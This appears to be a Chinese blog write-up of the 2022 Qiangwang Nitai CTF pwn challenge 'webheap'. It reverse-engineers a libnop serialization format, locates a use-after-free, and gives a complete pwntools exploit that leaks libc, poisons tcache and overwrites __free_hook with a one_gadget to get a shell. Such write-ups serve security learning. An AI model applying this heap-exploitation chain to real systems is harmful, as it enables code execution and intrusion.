2022强网拟态pwn-webheap

最新推荐文章于 2023-02-03 15:24:21 发布
最新推荐文章于 2023-02-03 15:24:21 发布
阅读量923 收藏 1
点赞数 4
分类专栏: wp 文章标签: linux python pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/127957660
版权

2022强网拟态pwn-webheap

这题的逻辑是一开始笔者硬逆给逆出来了,但是后面在Ex师傅的点播下成功的在github上找到了这个的原生项目
https://github.com/google/libnop
在这里插入图片描述
在审计的过程中发现了至关重要的信息,发现和逆向的格式一样的东西,就是上面的encoding_byte
首先在逆向中发现第一个必需要满足下面这个条件
在这里插入图片描述
在这里插入图片描述
笔者在调试的时候成功发现了char类型的溢出,-127~128,而-71对应的是0xb9,所以笔者后面在GitHub的那个项目上成功找到了,序列化的实例
在这里插入图片描述
上面给出10, “foo”,下面的compose的第一个就是0xb9,第二个是有几个参数,第三个是第一个参数的值,第四个是string类型,第五个是对应的foo的长度,第6个是foo这个字符串
所以笔者就配合前期逆向,顺着这上面的初步写了一个序列化实例
p8(0xb9) + p8(0x5) + p8(opt) + p8(index) + p8(0x82) + p32(size) + p8(0xbd) + p8(0x82) + p32(len(content)) + content
这个opt就是add,delete等的选择如下
在这里插入图片描述
0代表add,1代表show,序列化格式满足之后就会通过opt跳到这些处理函数中
index代表的是上图中的index,p8(0x82)代表后面要接一个p32的数据(这些都可以在上面的encoding_byte中找到是什么意思)p8(0xbd)代表的是字符串,接着后面会接content的长度和content,遵循上面的反序列化格式即可
在这里插入图片描述
但是直接这样的话会报STREAM error这个错误,笔者思考了一下发现后面可能要接上一个0来确定停止
在这里插入图片描述
p8(0xb9) + p8(0x5) + p8(opt) + p8(index) + p8(0x82) + p32(size) + p8(0xbd) + p8(0x82) + p32(len(content)) + content + p8(0)
最终如上构造就可以正常调用了
漏洞点的话出在delete中,一个uaf
在这里插入图片描述
笔者直接用的本机20.04的2.31 libc
简述一下笔者硬逆的过程
在这里插入图片描述
首先格式都在这个函数中,必须满足num0=-71,也就是0xb9,然后跟进442a函数里
在这里插入图片描述
接着又套着多个函数,如果格式不正确,会报一个0xe的错误也就是stream error了
在这里插入图片描述
在37e9中里可以逆出0x83这些东西
在这里插入图片描述
接着又可以在3c1f里逆出0x86这些东西
在这里插入图片描述
总的来说就是一层套一层很烦,然后再加上c++所以硬逆很费时间

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './webheap'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 0
if debug:
    r = remote()
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

def Serial(opt, index, size, content):
    p1 = p8(0xb9) + p8(0x5) + p8(opt) + p8(index) + p8(0x82) + p32(size) + p8(0xbd) + p8(0x82) + p32(len(content)) + content + p8(0)
    r.sendlineafter('Packet length: ', str(len(p1)))
    r.sendafter('Content: ', p1)

def add(index, size):
    Serial(0, index, size, b'')

def show(index):
    Serial(1, index, 0, b'')

def delete(index):
    Serial(2, index, 0, b'')

def edit(index, content):
    Serial(3, index, 0, content)

add(0, 0x430)

add(1, 0x50)

delete(0)

show(0)

malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 96 - 0x10
li('malloc_hook = ' + hex(malloc_hook))
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym['__free_hook']
li('free_hook = ' + hex(free_hook))

one = [0xe3afe, 0xe3b01, 0xe3b04]
one_gadget = one[1] + libc_base

add(2, 0x68)
add(3, 0x68)
add(4, 0x68)

delete(2)
delete(3)

edit(3, p64(free_hook))
add(5, 0x68)
add(6, 0x68)
edit(6, p64(one_gadget))

r.interactive()

在这里插入图片描述
笔者看到了wjh师傅的exp,wjh师傅的思路也可以学习一下,改了一下项目的cpp和py,然后生成了so文件,就可以直接调用了
在这里插入图片描述

z1r0.
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
专栏目录
强网2022 pwn 赛题解析.docx
12-18
强网
2018强网杯CTF-题目整理-校本图片Readme.zip
最新发布
12-18
强网杯 2018强网杯CTF___题目整理 │ ├── 01Misc-4题 │ ├── 题目名称:ai-nimals │ │ └── 题目名称:ai-nimals.mhtml │ ├── 题目名称:welcome │ │ └── 题目名称:welcome.mhtml │ ├── ...
强网拟态REV-(fastjsoN)wp
Henlenl的博客
10-26 270
fastjsoN 依照这个链接可以知道 跟之前长安杯和看雪KCTF题目差不多 先用脚本恢复一下符号 0x02, 0x3A, 0x10, 0x6C, 0x6F, 0x6E, 0x67, 0x32, 0x73, 0x74, 0x72, 0x10, 0x73, 0x74, 0x72, 0x32, 0x6C, 0x6F, 0x6E, 0x67, 0x10, 0x73, 0x64, 0x66, 0x73, 0x66, 0x73, 0x64, 0x66, 0x0E, 0x73, 0x74, 0x72, 0x32,
强网杯-拟态
Stella_Leo的博客
08-24 301
做了一道拟态防御的题目。程序给了两个附件,一个32位一个64位。只有PIE保护没有开启。 32位 int vul() { char v1; // [esp+Ch] [ebp-10Ch] setbuf(stdin, 0); setbuf(stdout, 0); j_memset_ifunc((int)&v1, 0, 256); read(0, &v1, 768); return puts(&v1); } 非常明显的一个溢出 64位 __int64 vul()
2022强网拟态 (部分wp)
qq_62046696的博客
02-03 526
这道题也是看了很久,因为没环境,然后其他的wp写的比较简单,对于我这种菜鸡逃逸28位自己琢磨了好久,这种序列化逃逸的题,需要我们提前构造然后一步步写。
2022强网拟态pwn-bfbf
z1r0的博客
11-16 495
这题笔者感觉就是绕过这个read的限制,之前遇见过类似的,可以用close(0)然后read读flag的时候rdi可以置为0,就可以绕过line 0005的限制了,赛后看其他师傅的wp还看到了用sendfile的方法。控制好这里的数字然后泄露出libc,再打返回地址到rop链即可。漏洞点的话就是index这个下标没有限制从而导致的oob。
第四届强网拟态 EasyFilter
feng的博客
11-04 535
前言 当时比赛没报名,借了个号上去瞅了一眼题目,看到这个PHP代码审计比较亲切就做了这一题,当时也是通过报错大胆尝试成功试了出来解法。 赛后花爷拿着我的wp去了p神的知识星球问了一下原理,P神给了个解答,但是自己还没有看过PHP的C代码所以很难理解(实际上都一年没有碰过C语言了)。恰好打算把最近的事情忙完就去学学PHP的底层,过了这么些天,昨天弄好了vscode调试PHP的C代码的环境,今天仔细研究了一下终于有点懂了,而且第一次看PHP的底层C,感觉学到了好多的东西。 做题时候写的WP <?php
2018强网杯CTF-题目整理.zip
12-17
2018强网杯CTF___题目整理
第四届“强网拟态防御国际精英挑战赛.zip
12-07
拟态防御 CTF 国际精英挑战赛
Venom-2021-强网拟态防御国际精英挑战赛-WriteUp1
08-03
Venom-2021-强网拟态防御国际精英挑战赛-WriteUp1 本篇WriteUp主要介绍了Venom-2021强网拟态防御国际精英挑战赛中的一个Web挑战题,涉及到Node.js、Express框架、JavaScript、Crypto库、Cookie会话等技术。下面我们...
强网杯2019 拟态 STKOF
seaaseesa的博客
04-09 1044
强网杯2019 拟态 STKOF 给了我们两个二进制,分别为32位和64位,两个程序功能完全相同,有一个裁决程序,fork出这两个程序,并监听着它们的输出,如果两者输出不一样或者一方崩溃,则裁决程序就会kill掉它们两个。 首先,我们检查一下程序的保护机制 然后,我们用IDA分析一下,32位 64位 可知32位溢出的距离为0x110,64位溢出的距离为0x118。由于程序没有...
2021强网拟态复现
qq_46441427的博客
10-30 506
sonic checksec一下 发现开了PIE和NX还有relro,这里比赛的时候本来想打ret2csu的。。好像是这个名字。。忘了 程序打印出了main的地址,开PIE后三位不变,所以打印出main地址后直接取除了后三位的其他位,在ida找后三位地址加上就行,然后就可以栈溢出getshell from pwn import * #r=remote('123.60.63.90',6890) r = process('./sonic') context(arch='amd64', os='linux')
2022强网拟态pwn-store
z1r0的博客
11-22 710
首先是这个沙箱,64位只有r和w,一开始看的时候很纳闷多了32位的限制,64位还没有o,查了一下才知道这样的seccomp-tools是以64位的检查来检查的,所以上面显示的32位系统调用就是64位的系统调用,所以看一下上面在32位显示的这些实际上是多少。所以思路比较清楚,利用house of apple2控制程序流程,mprotect控制rwx权限,布置shellcode,需要注意的是远程flag文件名需要getdents找一下,找完了之后利用orw即可。chmod对应是0x5a,对应32位是mmap。
第五届“强网拟态防御国际精英挑战赛——线上预选赛火热开赛!
Cyberpeace的博客
11-04 428
截至2022年,第五届“强网拟态防御国际精英挑战赛已累积接受全球万余支战队、数十万人次的参与!
第五届“强网拟态防御国际精英挑战赛——预选赛入围战队篇
Cyberpeace的博客
12-02 1144
第五届“强网拟态防御国际精英挑战赛战队集结完毕,期待各位顶峰相见!
重磅来袭 | 第五届“强网拟态防御国际精英挑战赛创新升级,燃爆全球!
Cyberpeace的博客
10-09 420
此外,线上预选赛会面向全球战队开放报名,具体报名信息即将发布,敬请期待!此外,本届比赛特别设置“实网验证挑战赛”,通过邀请战队实际验证的方式,直观展示车联网设备,在增加比赛挑战性和趣味性的同时,进一步检验拟态设备相较于非拟态设备的技术优越性,通过现场的设备反馈,使拟态防御效果更加真实可感。本届比赛创新开辟四大赛道,在第四届大赛引入ADAS设备测试的基础上,进一步将赛道细化为“互联网赛道”“车联网赛道”“电信网赛道”“密码机赛道”四项,激励具有技术专长的人才在比赛中发挥所长进行比拼。
2021强网拟态 pwn random_heap
yongbaoii的博客
01-18 192
题目的难度在于他chunk分配的地址是随机的。 如何能破掉这种随机。 我采取的方法是硬爆破,直到爆破到我想要的那种形式,我们加以利用。 爆破的过程中可以稍加采取限制,减少爆破时间。 # -*- coding: utf-8 -*- from pwn import* from ctypes import * #context.log_level='debug' context.arch='amd64' context.os = "linux" #context.terminal = ["tmux", "sp.
第五届“强网拟态防御之PWN1与近段时间对unlink的理解
Probeginner的博客
11-06 309
来个拟态防御简单一题
web项目部署后heap溢出(jconsole java虚拟机内存管理 tomcat内存管理)
weixin_34055787的博客
12-06 118
阶段性完成编码工作后,打算将项目部署到生产机上看看效果遇到了问题:原本在测试机的eclipse环境能够正常运行的web项目,打包成war文件部署在tomcat上运行后,报错:Java heap space在浏览器上,访问tomcat上部署的web项目时,在浏览器上显示的报错信息。简单的翻译过来就是java的heap溢出。为什么会heap溢出?怎么解决这个...
强网杯-2022 yakagame
11-22
强网杯-2022 yakagame是一个国际性的网络安全竞赛,旨在提高参赛者在网络安全领域的技术能力和解决问题的能力。比赛的目标是通过攻防对抗的方式,测试参赛者在网络攻防、逆向工程、密码学等方面的知识与技能。 在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值